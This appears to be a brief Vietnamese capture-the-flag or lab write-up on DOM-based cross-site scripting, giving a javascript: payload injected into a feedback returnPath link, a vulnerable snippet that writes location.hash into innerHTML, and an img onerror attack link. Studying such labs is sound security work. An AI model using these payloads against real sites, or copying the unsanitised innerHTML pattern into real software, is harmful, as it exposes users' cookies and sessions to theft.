• Trang chủ

• Hoàn thành
• Chèn payload: javascript:alert(document.cookie) ở url

• Chèn vào href: /feedback?returnPath=javascript:alert(document.cookie)

Giải thích

1, DOM-based XSS (quan trọng)

DOM XSS xảy ra khi JavaScript trên trang tự lấy dữ liệu từ client (URL, fragment, cookie, location...) rồi chèn vào DOM mà không sanitize.

Ví dụ code JS trên trang:

varpage=location.hash;
document.getElementById("content").innerHTML=page;

Attacker gửi link:

<https://site.com/#><img src=x onerror=alert(1)>